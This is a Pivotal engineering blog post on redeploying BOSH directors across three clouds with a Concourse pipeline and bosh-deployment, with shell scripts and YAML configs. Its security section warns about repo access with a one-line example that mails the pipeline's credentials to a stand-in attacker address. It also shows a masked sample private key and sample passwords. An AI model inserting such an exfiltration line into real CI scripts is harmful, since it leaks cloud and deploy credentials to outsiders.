Pivotal Engineering Journal

Technical articles from Pivotal engineers.

Maintaining BOSH Directors with Concourse CI and bosh-deployment

BOSH directors can be deployed (and redeployed) with a properly built Concourse pipeline and manifests generated by the curated bosh-deployment manifest generation tool. This lightens the burden of keeping BOSH directors patched & up-to-date.

Categories:   BOSH    Concourse   

“BOSH deploys Concourse, and Concourse deploys BOSH” —Cloud Foundry koan

A BOSH Director is a VM (virtual machine) orchestrator which is itself a VM. BOSH solves the problem of keeping its VMs’ applications (operating systems (stemcells) and releases) up-to-date with the command bosh deploy; however, this raises the question, “What keeps the BOSH Director itself up-to-date?” [Quis custodiet?]

We explore using Concourse, a Continuous Integration (CI) server, and bosh-deployment [Updating BOSH], in order to create a Concourse pipeline which updates, in turn, a BOSH director on AWS (Amazon Web Services), on Microsoft Azure, and GCP (Google Cloud Platform). Updating all three BOSH directors can be accomplished with a single click. [One click] Best of all, our directors are re-deployed with a recent stemcell, BOSH release, and CPI release. [How recent?]

0. Overview

Our Concourse pipeline is publicly-viewable, and can be seen at https://ci.nono.io/teams/main/pipelines/BOSH. It’s a straightforward pipeline which consists of three jobs, one for each director on each IaaS (Infrastructure as a Service): bosh-aws.nono.io, bosh-azure.nono.io, and bosh-gce.nono.io.

Below is a diagram of our Concourse configuration which describes the pipeline in greater detail. Note that we keep our credentials (e.g. our AWS access key and secret) in LastPass (see items in red), but LastPass is not strictly necessary: credentials can be embedded directly in the BOSH manifests, can be passed as variables during the BOSH manifest creation, or can be maintained as files on the local hard drive.

1. Concourse Tasks

To build our Concourse pipeline, we begin with the smallest configurable component, the Concourse task.

The Concourse task is often a set of Concourse resources (e.g. GitHub repositories containing BOSH manifests), environment variables (e.g. ${IAAS}, the IaaS to which we’re deploying), and perhaps most importantly, the shell script which deploys the director.

1.0 Concourse Task Shell Script

Here is the annotated shell script that our Concourse tasks use to deploy our BOSH director:

[Note: see the next section, Simplify the Concourse Task Script, for a simpler task shell script; it’s a better starting point. We customize our BOSH directors in a manner which complicates our task shell script.]

#!/bin/bash

# We abort the script as soon as we hit an error (as soon as a command exits
# with a non-zero exit status)
set -e

# `cunnie-deployments` is the checked-out GitHub repo that contains our BOSH
# manifests and our directors' `-state.json` files; it also contains this
# script (task script) and task definition.
pushd cunnie-deployments

# We invoke the script that generates our BOSH director's manifest, e.g.
# `aws.sh`, `azure.sh`. The output, the BOSH director's manifest, is named
# `bosh-$IAAS.yml`, e.g. `bosh-aws.yml`
bin/$IAAS.sh

# Does ${DEPLOYMENTS_YML} have a complete set of interpolated variables?
# Abort if not (`--var-errs`).
bosh int bosh-$IAAS.yml \
  --var-errs \
  -l <(echo "$DEPLOYMENTS_YML") \
  -l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml) \
  > /dev/null

# We attempt to deploy our BOSH director. We prepare a git commit message
# regardless whether our attempt succeeds or fails because we need to retain any
# change to the BOSH director's `-state.json` file. This is necessary in cases
# where a deploy proceeds far enough to create a broken director VM, for
# subsequent deploys must be able to destroy the broken director VM in order to
# free up its IP address so that the current deploy will succeed. The crucial
# information needed to destroy the broken director VM is its VM's ID, which is
# recorded in the `-state.json` file.

# Note that `set -e` does not trigger an abort if the command that returns a
# non-zero exit code is the subject of an `if` block, i.e. `if bosh create-env`;
# this gives us the breathing room to commit our results regardless of whether
# `bosh create-env` succeeded or failed
if bosh create-env bosh-$IAAS.yml \
  -l <(echo "$DEPLOYMENTS_YML") \
  -l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml); then
  GIT_COMMIT_MESSAGE="CI PASS: $IAAS BOSH deploy :airplane:"
  DEPLOY_EXIT_STATUS=0
else
  GIT_COMMIT_MESSAGE="CI FAIL: $IAAS BOSH deploy :airplane:"
  DEPLOY_EXIT_STATUS=1
fi

# Do we need to commit anything? If a new director hasn't been deployed (most
# often because there's been no change to the manifest, releases, or stemcell),
# then we don't need to commit
if ! git diff --quiet HEAD --; then
  # If we're in this block, then there has been a deployment. Let's set our
  # git author to avoid git's `*** Please tell me who you are.` error.
  git config --global user.name "Concourse CI"
  git config --global user.email brian.cunnie@gmail.com

  # We check out our branch's HEAD because Concourse's git-resource leaves us
  # in `detached HEAD` state. ${DEPLOYMENTS_BRANCH} is typically set to
  # `master`, but may be set to something else (usually while testing).
  git checkout $DEPLOYMENTS_BRANCH
  git add .
  git commit -m"$GIT_COMMIT_MESSAGE"
fi
popd

# We copy our repo with its new commit to a new directory. The Concourse job,
# after it finishes running this task, will push the new commit to GitHub.
# Note that `cp -R` works as well as `rsync`; we use `rsync` by force of
# habit.
rsync -aH cunnie-deployments/ cunnie-deployments-with-state/

# We exit with the return code of `bosh create-env`; if the deploy failed, then
# this Concourse task failed
exit $DEPLOY_EXIT_STATUS
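
The script above leans on one bash behavior: under `set -e`, a command that fails as the condition of an `if` does not abort the script, so the follow-up work still runs and the failure can be reported later. The sketch below isolates that pattern. `fake_deploy` and `deploy_and_record` are hypothetical names; `fake_deploy` merely stands in for `bosh create-env`.

```shell
#!/bin/bash
set -e

# Hypothetical stand-in for `bosh create-env`: succeeds only when given "ok".
fake_deploy() {
  [ "$1" = "ok" ]
}

# Run the deploy as the condition of an `if` so that a failure does not
# trigger `set -e`, record the outcome, do the follow-up work, and only
# then hand back the saved status.
deploy_and_record() {
  local status message
  if fake_deploy "$1"; then
    message="CI PASS"
    status=0
  else
    message="CI FAIL"
    status=1
  fi
  # Reached on both paths (in the real script, this is the git commit).
  echo "$message: state recorded"
  return "$status"
}

deploy_and_record ok                 # prints "CI PASS: state recorded"
# `|| true` keeps this demo from exiting with the saved failing status.
deploy_and_record broken || true     # prints "CI FAIL: state recorded"
```

In the real task script the saved status is passed to `exit` on the last line, which is what marks the Concourse task as failed.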

For those interested in the scripts which generate the BOSH director manifests (e.g. aws.sh), they were covered in an earlier blog post. For links to the scripts and the manifests they generate, see the table below:

IaaS    Script      Generated Manifest
AWS     aws.sh      bosh-aws.yml
Azure   azure.sh    bosh-azure.yml
GCP     gce.sh      bosh-gce.yml

1.1 Simplify the Concourse Task Script

Start with a simple Concourse task script. Really. Don’t use the task script we use (the one listed above). [Why so complicated?] Instead, start with a simplified task script, like bosh-simple.sh. We have tested it; it successfully deploys a director.

1.2 Concourse Task Configuration File

Now that we have our task’s shell script, we turn our attention to our task’s (YAML) configuration file. It can be viewed on GitHub, and is displayed below, too:

---
platform: linux

image_resource:
  type: docker-image
  source:
    repository: cunnie/fedora-golang-bosh

inputs:
- name: cunnie-deployments
- name: bosh-deployment

outputs:
- name: cunnie-deployments-with-state

params:
  # vainly default branch to master, but it's always overridden from the pipeline
  DEPLOYMENTS_BRANCH: 'master'
  DEPLOYMENTS_YML: ''
  IAAS: ''

run:
  path: cunnie-deployments/ci/tasks/bosh.sh

Notes:

image_resource: We use a custom-built Docker image, cunnie/fedora-golang-bosh (https://hub.docker.com/r/cunnie/fedora-golang-bosh/~/dockerfile/); but you may choose to use your own Docker image; just be sure that the BOSH CLI is installed. Our image is fairly hefty (450 MB), for it has a rich set of tools available to us when we need to intercept the container to troubleshoot a build.

inputs: We have two inputs: bosh-deployment, a git repo which contains the manifests and tools necessary to deploy a BOSH director (this is the canonical way to deploy a BOSH director), and cunnie-deployments, a git repo which contains our BOSH directors’ manifests and state files. Also, this repo contains the required Concourse task definition (ci/tasks/bosh.yml) and script (ci/tasks/bosh.sh).

outputs: We have one output, cunnie-deployments-with-state, which is the same as the input, cunnie-deployments. Concourse prohibits an input from also being an output, so our script copies the contents of one to the other. cunnie-deployments-with-state includes the commits made by the task (in the case of a deploy, the state file and possibly the BOSH director’s manifest). This output is used by a subsequent step in the Concourse job which will push any git commits to GitHub (although this Concourse task may make git commits, it won’t push them — it leaves that responsibility to the Concourse job).

params: DEPLOYMENTS_BRANCH is almost always set to master; it refers to the branch in the cunnie-deployments repo. IAAS is either aws, azure, or gce. DEPLOYMENTS_YML is YAML-formatted and contains secrets needed to deploy; sample contents can be viewed in an earlier blog post.

[Note: you may opt to bypass the task configuration file completely and embed the necessary information into pipeline.yml; here is an example of embedding the task configuration directly into the pipeline.]
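
The outputs note above mentions the commits made by the task. As a rough sketch of that step in isolation, the helper below commits only when tracked files differ from HEAD, using the same `git diff --quiet HEAD --` test as the task script. The helper name `commit_if_changed`, the throwaway repo, the placeholder email address, and the state-file contents are all assumptions made for illustration.

```shell
#!/bin/bash
# Hypothetical helper: commit everything in a repo, but only when tracked
# files differ from HEAD.
commit_if_changed() {
  local repo="$1" message="$2"
  if ! git -C "$repo" diff --quiet HEAD --; then
    git -C "$repo" add .
    git -C "$repo" -c user.name="Concourse CI" -c user.email="ci@example.com" \
      commit --quiet -m "$message"
    echo "committed"
  else
    echo "nothing to commit"
  fi
}

# Demo in a throwaway repo; the state-file contents are illustrative only.
repo="$(mktemp -d)"
git -C "$repo" init --quiet
echo '{}' > "$repo/bosh-aws-state.json"
git -C "$repo" add .
git -C "$repo" -c user.name="Concourse CI" -c user.email="ci@example.com" \
  commit --quiet -m "initial state"

commit_if_changed "$repo" "CI PASS: aws BOSH deploy"   # prints "nothing to commit"
echo '{"current_vm_cid": "i-0123"}' > "$repo/bosh-aws-state.json"
commit_if_changed "$repo" "CI PASS: aws BOSH deploy"   # prints "committed"
rm -rf "$repo"
```

One caveat: `git diff` ignores untracked files, so a state file that has never been committed would not be detected by this test on its own.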

2. Concourse Jobs

The Concourse job is straightforward:

  • It checks out the cunnie-deployments and bosh-deployment git repos
  • It runs the task which deploys the BOSH director to the specified IaaS
  • It pushes changes to the director manifest (bosh-${IAAS}.yml) and the director state (bosh-${IAAS}-state.json) to the cunnie-deployments repo regardless of whether the deploy succeeded or failed (i.e. the ensure directive)

Here is the Concourse job definition which deploys the BOSH director to the AWS IaaS:

jobs:
- name: bosh-aws.nono.io
  plan:
  - get: cunnie-deployments
  - get: bosh-deployment
  - task: deploy
    file: cunnie-deployments/ci/tasks/bosh.yml
    params:
      DEPLOYMENTS_BRANCH: master
      DEPLOYMENTS_YML: ((deployments_yml))
      IAAS: aws
    ensure:
      put: cunnie-deployments
      params:
        repository: cunnie-deployments-with-state/

3. Concourse Pipeline

The full Concourse pipeline (pipeline.yml) can be seen here. Below is an abbreviated portion which shows the Concourse resources and the first job (which deploys the AWS BOSH director):

# fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"

jobs:
- name: bosh-aws.nono.io
  plan:
  - get: cunnie-deployments
  - get: bosh-deployment
  - task: deploy
    file: cunnie-deployments/ci/tasks/bosh.yml
    params:
      DEPLOYMENTS_BRANCH: master
      DEPLOYMENTS_YML: ((deployments_yml))
      IAAS: aws
    ensure:
      put: cunnie-deployments
      params:
        repository: cunnie-deployments-with-state/
# Other jobs redacted for brevity
resources:
- name: cunnie-deployments
  type: git
  source:
    uri: git@github.com:cunnie/deployments.git
    private_key: ((github_deployments_key))
    branch: master
- name: bosh-deployment
  type: git
  source:
    uri: https://github.com/cloudfoundry/bosh-deployment.git

Notes:

The first line is a convenience comment; it shows the fly (Concourse CLI) command which updates the Concourse server’s pipeline after changes have been made to the pipeline.yml file. We cut-and-paste that comment into our shell whenever we make a change to pipeline.yml in order to propagate the changes to the pipeline to our Concourse server:

fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"

We have already discussed deployments_yml (i.e. the Concourse task environment variable/parameter DEPLOYMENTS_YML), but the other variable, github_deployments_key, warrants discussion. It is a GitHub deploy key which allows our job to push changes to the cunnie-deployments repo. [Interpolation]

We’d like to discuss how we stop the pipeline when the deploy of a BOSH director fails. We use Concourse’s passed directive. For example, if our deploy of the AWS director fails, we do not want to deploy the Azure director.

The following shows the diff between the job to deploy the AWS director and the job to deploy the Azure director. Pay special attention to the passed and trigger directives: the deploy of the Azure director is kicked off if and only if there has been a successful deploy of the AWS director. This limits the damage caused by a flawed configuration: only one director is knocked offline (typically the first one, AWS), not all three.

-- name: bosh-aws.nono.io
+- name: bosh-azure.nono.io
   plan:
   - get: cunnie-deployments
+    passed: [ bosh-aws.nono.io ]
+    trigger: true
   - get: bosh-deployment
+    passed: [ bosh-aws.nono.io ]
+    trigger: true
   - task: deploy
     file: cunnie-deployments/ci/tasks/bosh.yml
     params:
       DEPLOYMENTS_BRANCH: master
       DEPLOYMENTS_YML: ((deployments_yml))
-      IAAS: aws
+      IAAS: azure
     ensure:
       put: cunnie-deployments
       params:

4. Security

Our credentials are stored in our Concourse pipeline, and they can be easily revealed by a trusted user with the following command:

fly -t nono get-pipeline -p BOSH

These credentials include IaaS credentials, which will allow a bad actor to spin up multiple VMs to run, say, Bitcoin mining. A co-worker of the author whose credentials were compromised had unauthorized AWS charges exceeding $3k.

It is also important to restrict access to the GitHub repo which contains the scripts that are run. Although the repo does not contain credentials, it enables the execution of commands which can reveal the credentials. For example, the following line of code could be added to the ci/tasks/bosh.sh script to email the credentials to the bad actor:

echo ${DEPLOYMENTS_YML} | mail -s "secret credentials" bad.actor@mailinator.com

Footnotes

[Quis custodiet?] “Who updates the VM [BOSH director] that keeps the other VMs updated?” is the question, versions of which have been asked as long ago as the days of the Roman poet Juvenal, who famously asked, “Quis custodiet ipsos custodes?” and as recently as this century by comic book writer Alan Moore, who phrased it, “Who watches the Watchmen?”

[How recent?] How fresh is bosh-deployment? Fresh. bosh-deployment is a quite active git repo, typically updated several times or more each week. It’s the tool that the BOSH team, and many Cloud Foundry teams, use to keep their BOSH directors current.

[Updating BOSH] In the early days, the BOSH micro plugin was the mechanism to update the BOSH director. There were several drawbacks to the micro plugin, one of which is that it forced the BOSH CLI to have an understanding of the API for various IaaSes, breaking the Cloud Layer abstraction model.

Another drawback of the BOSH micro plugin was that it was brittle, so much so that it was a common pattern to deploy a BOSH director whose sole purpose was to deploy the “real” BOSH director. “Ha!” one might ask, “But how did you keep that first BOSH director up-to-date?” The answer is simple: you didn’t. You left that first BOSH director running and never touched it except to redeploy the “real” BOSH director. You might spin it down if you weren’t using it, but you never deleted it or updated it.

These were serious problems, and to address them the BOSH Core team wrote bosh-init, a Golang-based executable whose purpose was to deploy BOSH directors. It adhered to the Cloud Layer abstraction models (it used the existing CPIs (Cloud Provider Interfaces) for the existing IaaSes (VMware vSphere, Google Cloud Platform (GCP), OpenStack, Microsoft Azure, among others)).

By April 30, 2015, bosh-init was production-ready, and the BOSH documentation was updated to reflect the new world order.

But all was not perfect in the Garden of Eden, for the introduction of bosh-init split the CLIs: whereas before there was one BOSH CLI, now there were two: bosh, the original Ruby-based CLI for managing a BOSH director’s deployment, and bosh-init for deploying a BOSH director itself. In many ways this resembled the Western Schism, a dark chapter in the Roman Catholic church when there were two popes (who had the terrible habit of excommunicating each other). The BOSH development team remedied this situation by creating a third CLI, the Golang-based CLI. In this regard, the BOSH development team’s approach mirrored the approach attempted by the Catholic cardinals, who elected a third pope. The BOSH team’s approach succeeded, but the cardinals’ didn’t (they were left with three popes running around excommunicating each other).

[One click] It’s technically possible to kick off the builds with zero clicks — to kick off the build automatically if, say, a commit is pushed to the bosh-deployment repository. The modification to the pipeline is trivial:

 - name: bosh-aws.nono.io
   plan:
   - get: cunnie-deployments
   - get: bosh-deployment
+    trigger: true
   - task: deploy

However, the decision to trigger automatically is not without risks: the BOSH director may be in the middle of a delicate task, such as updating a deployment, and won’t have the opportunity to gracefully bring itself down, for bosh create-env is relentless, brooks no delays, and gives no quarter.

On a more technical note, although bosh create-env will attempt to contact the BOSH agent on the original BOSH director in order to terminate the jobs and shut down the VM, it does not run the drain scripts (scripts which allow the BOSH jobs to clean up and get into a state where they can be safely stopped).

There is discussion within the BOSH development team whether to modify the behavior of bosh create-env to make it run the drain scripts. On the positive side, it will allow a more cavalier approach to re-deploying the director, and make the behavior of bosh create-env more closely approximate the behavior of a BOSH director. On the downside, the time to deploy a BOSH director may vary widely, dependent on the time it takes for the drain scripts to complete.

[Interpolation] Our GitHub deploy key resembles the following (not our real key) [Elliptic-curve]:

-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
-----END EC PRIVATE KEY-----

Concourse, when passed the flag ... -v github_deployments_key="$(lpass show --note github_deployments_key)" will interpolate this section of pipeline.yml:

type: git
source:
  uri: git@github.com:cunnie/deployments.git
  private_key: ((github_deployments_key))

After interpolation, the pipeline looks like this:

- name: cunnie-deployments
  type: git
  source:
    uri: git@github.com:cunnie/deployments.git
    # previously: private_key: ((github_deployments_key))
    private_key: |
      -----BEGIN EC PRIVATE KEY-----
      MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
      AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
      Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
      -----END EC PRIVATE KEY-----

If your pipeline is not public, it may be easier to skip variable interpolation and embed the credential(s) directly.

[Why so complicated?] Our Concourse task is complicated (i.e. bosh.sh calls ${IAAS}.sh, and the bosh CLI is invoked three times in total) because we have requirements beyond merely deploying a BOSH director:

  • We retain intermediate BOSH manifests (e.g. bosh-aws.yml), manifests that are completely populated with the exception of the secrets (passwords, credentials, private keys). The sole purpose of the first bosh interpolate command is to generate the intermediate manifest.

    We realize that our love of the intermediate manifests is not wholly rational: time was when a working BOSH manifest was a precious thing, something to tend to and to preserve. With the advent of bosh-deployment, which reliably generates BOSH manifests, the intermediate manifests have diminished in importance, and are now merely artifacts of a bygone age. And yet we still cling to them, for they provide a sense of comfort, like a mother’s hot apple pie.

  • We prefer to set our own passwords rather than use the ones auto-generated [auto-passwords] by the BOSH CLI. This has two implications:

    • It forces us to set the password variables in a counter-intuitive manner (e.g. bosh interpolate ... -v admin_password='((admin_password))' ...), which says, in effect, “replace all occurrences of ‘((admin_password))’ with ‘((admin_password))’”. This prevents the BOSH CLI from using its auto-generated passwords and paves the way to subsequently interpolate our passwords. This adds several lines to our scripts.

    • It forces us to check to make sure that we haven’t overlooked any variables (i.e. we run bosh interpolate --var-errs ...), so that, for example, our director’s password is set to IReturnedAndSawUnderTheSun and not ((admin_password)). This adds several more lines to our scripts.

  • Our BOSH director uses certificates issued by a recognized CA (Certificate Authority) (in our case, Comodo). This requires us to create a manifest operations file (e.g. etc/aws.yml) which we pass to bosh interpolate which overrides the auto-generated SSL certificate & key with our certificate & key.

  • Some of our BOSH directors (e.g. bosh-aws.nono.io) are more than mere BOSH directors — they are also nginx servers (web servers), DNS (Domain Name System) servers, and NTP (Network Time Protocol) servers. This adds three more lines to our scripts.

Note: one advantage of using CA-issued certificates and easy-to-remember passwords is that it enables one to reach the BOSH director via the CLI without needing the creds.yml file — one can sit at a new workstation, type bosh -e bosh-gce.nono.io login, and proceed to manage deployments, releases, stemcells, etc….
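
The check for overlooked variables described above can be illustrated at the text level. The sketch below simply scans a manifest for leftover `((name))` placeholders. It is a plain-text approximation, not how the BOSH CLI implements `--var-errs`, and the helper name `find_unresolved_vars` and the sample manifest are hypothetical.

```shell
#!/bin/bash
# Hypothetical helper: list ((placeholders)) still present in a manifest.
# A plain-text scan only; `bosh interpolate --var-errs` is the real check.
find_unresolved_vars() {
  grep -o '(([A-Za-z0-9_./-]*))' "$1" | sort -u
}

# Made-up sample manifest with one leftover placeholder.
manifest="$(mktemp)"
printf 'director_name: bosh-aws\nadmin_password: ((admin_password))\n' > "$manifest"

find_unresolved_vars "$manifest"   # prints ((admin_password))
rm -f "$manifest"
```

An empty result suggests every placeholder was filled in; any line of output names a variable that would otherwise end up in the deployed configuration verbatim.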

[auto-passwords] The BOSH CLI generates high-entropy passwords when the --vars-store flag is passed.

Here is a list of sample passwords that bosh create-env --vars-store=... creates:

admin_password: qn7hc6zsq0nphhsvojx3
blobstore_agent_password: iut5wdyeo5kkhvqoerj0
blobstore_director_password: wm0qgnzdwgy8k1hnm4nq
hm_password: plk829eob45khq6o9dl5
mbus_bootstrap_password: nf16h5e9j120uqp35hlr
nats_password: gr4s0xmj4s5iccqv69dt
postgres_password: 7nxuq714hxcta513778g
registry_password: ffxnhu4xtgh7lsxu7xpl

Note that the passwords are 20 bytes long and consist of a random sequence of numbers and lowercase letters. Each byte can be one of 36 possibilities (10 numbers plus 26 letters). Given that there are 20 bytes, the total number of combinations is 36²⁰ ≈ 1.34 × 10³¹, effectively rendering the password immune to a brute-force attack: even if you could make a million attempts every second, it would still require 4 × 10¹⁷ years to exhaust all combinations. In other words, you’d crack the password long after the Stelliferous Era ended and you were well into the Degenerate Era.
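
The arithmetic above can be reproduced with a couple of lines of awk. This is only a back-of-the-envelope check; the function names `keyspace` and `years_to_exhaust` are made up for this sketch, and the guess rate of one million attempts per second is the same assumption used in the text.

```shell
#!/bin/bash
# Size of the keyspace: alphabet_size ^ length, in scientific notation.
keyspace() {
  awk -v n="$1" -v len="$2" 'BEGIN { printf "%.2e\n", n ^ len }'
}

# Years needed to try every combination at a given (assumed) guess rate,
# using a 365.25-day year.
years_to_exhaust() {
  awk -v n="$1" -v len="$2" -v rate="$3" \
    'BEGIN { printf "%.1e\n", (n ^ len) / rate / (365.25 * 24 * 3600) }'
}

keyspace 36 20                    # prints 1.34e+31
years_to_exhaust 36 20 1000000    # prints 4.2e+17
```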

[Elliptic-curve] We use elliptic-curve cryptography (ECC) keys, for they are much shorter than an RSA key of equivalent strength, and thus more manageable. Unfortunately, they are not universally accepted (e.g. AWS will respond with “Error importing Key Pair Key is not in valid OpenSSH public key format” when importing an EC public key).

Where elliptic-curve cryptography is concerned, GitHub is ahead of the proverbial curve, and AWS, behind.

Corrections & Updates

2017-12-01

We suggest simplifying the Concourse task script. The Concourse task script executes the BOSH CLI three times (bosh int twice and bosh create-env once), but need only execute it once (bosh create-env) when intermediate artifacts aren’t desired.

2017-11-25

David McClure pointed out that the OpenStack link was missing; it has been added. Thanks, David.